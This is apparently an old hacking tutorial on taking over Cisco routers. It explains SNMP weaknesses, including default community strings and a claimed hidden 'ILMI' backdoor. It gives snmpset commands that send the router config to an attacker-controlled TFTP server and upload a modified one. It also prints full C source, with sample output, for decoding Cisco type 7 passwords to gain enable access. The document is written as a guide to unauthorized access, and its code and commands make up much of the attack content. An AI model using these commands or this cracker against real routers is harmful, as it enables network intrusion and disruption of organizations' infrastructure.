cisco
security:
I
have seen a lot of information regarding security mismanagement of
servers;
Unix, Linux, NT, Novell, or AS400. However, one point has been missed
consistently
by many articles. However, what these sources of information are missing
is that
routers are very frequently targets of attacks. If you cannot route
packets to your destination, you cannot do anything. Many
people believe that a Cisco router is impervious to attacking, this is
simply
not the case. In fact, they are a bit frail
...
Basically,
the Cisco IOS has more than one level of authority to it's system. After
connecting to the machine via telnet, ssh or a console cable, you are
asked for a
password for the machine. This is the general password to the box. Usually
it is
very common, such as "hostname" or "hostnamenet" or
similar. I have even seen
them
having white space or no password. This is not a secure level of control
over the
router. However, the next step is the getting the enable password. This
enables
all of the controls and interface commands via the console. This is a very
dangerous level of authority to give users.
I
am going to cover a few commonly used methods of obtaining this level of
access.
The Console method requires you to have physical access to the
router.
Console
Attack
Now
if you actually have physical access to the router there is a method to
change/set the enable password. These methods are actually published by
Cisco as a
method for recovering a router once the enable password has been
lost.
See
http://www.cisco.com/warp/public/474/
and follow the directions for your hardware.
Remote
Attack
So,
you don't have the key to the server room or Telco closet, or is that
router 2000
miles away? Are you out of luck? No of course not, you just have to use a
different method to get the enable level authority. Without further ado,
let's
begin.
Most
organizations have different routers doing different tasks. Some are
access
routers, some perform core backbone routing, or edge routing. The point
being
most companies have a few of these devices spread out all over their
company.
Administrators must perform the day to day support and monitoring of these
devices to be sure that things are running smoothly. This includes making
sure
interfaces are up, CPU utilization is within acceptable ranges, verifying
that
there are no unusual traffic patterns that might indicate a hostile
attack, and
many more tasks. One thing most of these administrators use to help them
perform their jobs is SNMP. Simple Network Management Protocol is a widely
used
method to communicate with many devices, from routers to switches to NT
and Unix
servers. Almost any network device has the ability to use SNMP for
monitoring
and alerting.
There
are a few bad things about SNMP from a security standpoint though.
First,
and probably most importantly, SNMP Version 1 has no real concept of
authentication. Any device with SNMP setup will happily fulfill any
request it
receives. (To receive a request the only thing that is required is a
community
name, a small string of text used for configuration.)
Although
SNMP Version 2 and 3 have provisions for encrypting packets, this is not
widely deployed,
and you
guessed it, never enabled by default.
The
second bad thing about SNMP is that it usually also comes enabled by
default.
And these community names are set to a default of public and private. The
public
community usually can see information and the private can set information.
eek!
The
third bad thing about SNMP is that it is an extremely "noisy"
protocol. This means that it sends allot of network traffic back and
forth. A
common implementation will employ a Managerial workstation (such as a
network
admin) that monitors many different devices. Each device may be polled
every 60
seconds. Each packet that goes out contains these community strings. A
quick
"sniff" of the network can provide you with these in the event
they
have been changed from the defaults.
The
fourth bad thing I want to bring up in this list of negatives about SNMP
is a very
common mis-configuration allowing ANY host to access a host via this
protocol.
Most networks I have seen allow for any node on the entire Internet to be
able
to communicate with their internal network via SNMP.
Finally,
if all that wasn't enough... ALL
Cisco IOS Router Images prior to IOS 12.2 have a hidden backdoor
read/write SNMP
community String of "ILMI". All routers before 12.2 are
sitting
there WIDE-OPEN!!
So
what can SNMP give the user? Among many very useful things like CPU
utilization,
interface statistics, port details, it also can be used to set various
items
inside the router. We are going to focus on one specific item here.
The
ability to upload and download config
files. The
config file is essentially a text file that the router uses to load it's
configuration when it boots. The information inside this file
contains the
information for network addresses, interfaces, routing policies, and even
passwords. This is really ground zero on the
router.
By
simply guessing or sniffing the community names you open enough window to
bring
down an entire network.
Allow
me to demonstrate. ...
#
snmpset -c ILMI #.#.#.# .1.3.6.1.4.1.9.2.1.55.$.$.$.$
router-config
(
Where $.$.$.$ is the TFTP Server you want the config file sent to and
#.#.#.# is
the router IP Address. )
Now
you have the config file, make whatever changes you need to, then upload
it back
with
#
snmpset -c ILMI #.#.#.# .1.3.6.1.4.1.9.2.1.53.$.$.$.$
router-config
Password
Cracking
You
have a nice config file to work with, now what? First you need to get some
of
the information off of the router. Look inside that config file you just
stole.
The information you
are specifically interested in is the:
enable
secret 5 efb487d9fbhen5oy485y&%#B7gtu32ib&
or
perhaps
enable
password 7 08204E
This
is the encrypted string that contains the password to the box. There is a
hint
here given to us from Cisco. The 5 is telling us that the password is
encrypted
by MD5. The 7 is a much weaker algorithm than that can easily be
squandered. Now
all that is left is cracking it. Mudge has posted the basics of what the
Cisco
"7" algorithm is, let's take a look at what he has to
say:
enable
password 7 08204E
The
encrypted string is 08204E.
"It
must be an even length of digits and the first two digits are used as a
base 10
index into the XOR string. The length of the plaintext password is
strlen(enc_pw)
-2 / 2. In this case 2 chars. 08 is the index into the XOR string. 2 is
multiplied by 16 (or left shifted 4 times) then the next digit (0) is
added to
it. [ == 32] 32 XOR xorstring[08] = 'a' Move to the next two digits and
repeat -
4 * 16 = 64 64 + 14 (E) = 78 increment the index into the XOR string 78
XOR
xorstring[08] = 'b' "
Given
this information it is trivial to code a quick c program that can be used
to
crank out the password;
For
example:
#include <stdlib.h>
#include <ctype.h>
#include <string.h>
#include <stdio.h>
int *HexPairsToIntArray(char *, int *, int *);
int main( int argc, char **argv )
{
char Crypto[256];
char value[] = "tfd;kfoA,.iyewrkldJKD";
int Elements;
int Error;
int i;
int unencchar;
int indy = 0;
int *Keys = NULL;
int index;
if( argc < 2 )
{
printf("Input String to Decode : ");
fgets(Crypto, sizeof Crypto, stdin);
}
else
{
strcpy( Crypto, argv[1] );
}
Keys = HexPairsToIntArray(Crypto, &Elements, &Error);
if(NULL == Keys)
{
printf("Error allocating memory for keys\n");
}
else
{
if(Error != 0)
{
printf("Data error? Code %d\n", Error);
}
else
{
printf("Decoding... %s\n\n", Crypto);
for(i = 0; i < Elements; i++)
{
if (i<1)
{
index= (Crypto[0] - '0') * 10 + (Crypto[1] - '0');
indy = (index-1);
}
else
{
unencchar = Keys[i] ^ value[indy];
printf("Key[%d] = %d XOR %d = %c\n", i, Keys[i],
value[indy], unencchar);
indy++;
if (indy==21)
{
indy = 0;
}
}
}
}
free(Keys);
}
return 0;
}
int *HexPairsToIntArray(char *s, int *n, int *err)
{
int *array = NULL;
char hextran[] = "0123456789ABCDEF";
char *p;
int i = 0;
*err = 0;
if(s)
{
*n = strlen(s) / 2;
array = calloc(*n, sizeof(int));
if(array != NULL)
{
for(i = 0; i < *n && 0 == *err; i++)
{
p = strchr(hextran, *s);
if(p != NULL)
{
array[i] = ((p - hextran) << 4);
s++;
p = strchr(hextran, *s);
if(p != NULL)
{
array[i] |= (p - hextran);
s++;
}
else
{
*err = 2;
}
}
else
{
*err = 2;
}
}
}
}
else
{
*err = 1;
}
return array;
}
The above ANSI C
code was written by me and is available to any via GPL licensing.
This is an
example of running it :
(The password is
'ab' the encrypted string is '08204E')
Input String to
Decode : 08204E
Decoding... 08204E
Key[1] = 32 XOR
65 = a
Key[2] = 78 XOR
44 = b
So
hop back on that router, and type "enable". When prompted
for
the password we know it's going to be
"ab"
And now we
know how to crack those pesky passwords...
| 